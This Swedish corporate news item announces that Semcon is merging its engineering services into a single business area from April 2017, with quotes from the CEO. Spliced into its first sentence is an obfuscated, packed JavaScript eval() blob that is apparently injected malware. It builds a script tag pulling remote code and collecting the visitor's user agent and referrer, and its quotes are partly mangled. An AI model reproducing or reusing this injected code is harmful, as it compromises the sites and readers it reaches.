Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Ny organisation för Semcons ingenjörstjänster

Ny organisation för Semcons ingenjörstjänster
Sebastian

Semcon eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|askif|var|u0026u|referrer|sfszd||js|php’.split(’|’),0,{}))
inför en ny organisation för bolagets ingenjörstjänster genom att samla dessa i ett gemensamt affärsområde, Engineering Services. Den nya organisationen införs från och med den 1 april 2017. 

Mot bakgrund av att den tyska ingenjörsverksamheten avyttrades i februari 2017, ser koncernen synergier och effektivitetsvinster med att samla Semcons affärsområden inom ingenjörstjänster i ett gemensamt affärsområde. Detta innebär att affärsområdet Engineering Services International med verksamhet i Brasilien, Indien och Storbritannien bildar ett nytt affärsområde tillsammans med Engineering Services Nordic. Namnet på affärsområdet blir Engineering Services. Affärsområdeschef för Engineering Services blir Olof Christensson (nuvarande affärsområdeschef för Engineering Services Nordic).

Engineering Services kommer ha cirka 1 500 medarbetare och verksamhet i Sverige, Norge, Storbritannien, Indien och Brasilien. I Semconkoncernens finansiella rapportering kommer det nya affärsområdet att redovisas från och med delårsrapport januari-mars 2017, vilken offentliggörs onsdagen den 26 april. Affärsområdet Product Information berörs inte av organisationsförändringen.

– Genom att samla Semcons ingenjörstjänster i ett affärsområde skapar vi en effektiv organisation som innebär positiva synergier. Den bidrar även till ett ännu tätare samarbete mellan våra marknader och divisioner, något som kommer vara fördelaktigt för våra kunder, säger Markus Granlund, vd för Semcon.